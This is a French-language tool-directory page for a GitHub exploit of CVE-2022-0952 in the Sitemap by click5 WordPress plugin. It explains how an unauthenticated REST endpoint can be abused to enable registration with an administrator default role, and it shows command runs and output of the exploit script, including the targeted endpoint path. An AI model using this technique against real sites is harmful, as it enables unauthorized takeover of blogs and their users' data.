Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-0952 — Sitemap par click5 < 1.0.36 - Mise à jour non authentifiée d'options arbitraires | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2022-0952
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionMauvaise Configuration
GitHubrandomrobbiebf/cve-2022-0952

CVE-2022-0952

Sitemap par click5 < 1.0.36 - Mise à jour non authentifiée d'options arbitraires

Voir le dépôt
51il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-0952

Sitemap by click5 < 1.0.36 - Mise à jour non authentifiée d'options arbitraires

Description

Le plugin ne dispose pas de vérifications d'autorisation et de CSRF lors de la mise à jour d'options via un point de terminaison REST, et ne garantit pas que l'option à mettre à jour appartient au plugin. En conséquence, des attaquants non authentifiés pourraient modifier des options arbitraires du blog, telles que users_can_register et default_role, leur permettant de créer un nouveau compte administrateur et de prendre le contrôle du blog.

Exemple d'activation Admin et Inscription

root@kitploit:~
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555
The plugin version is below 1.0.36.
The plugin version is 1.0.35
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.

Exemple de désactivation Admin et Inscription

root@kitploit:~
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555 --fix yes
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
Télécharger l’outil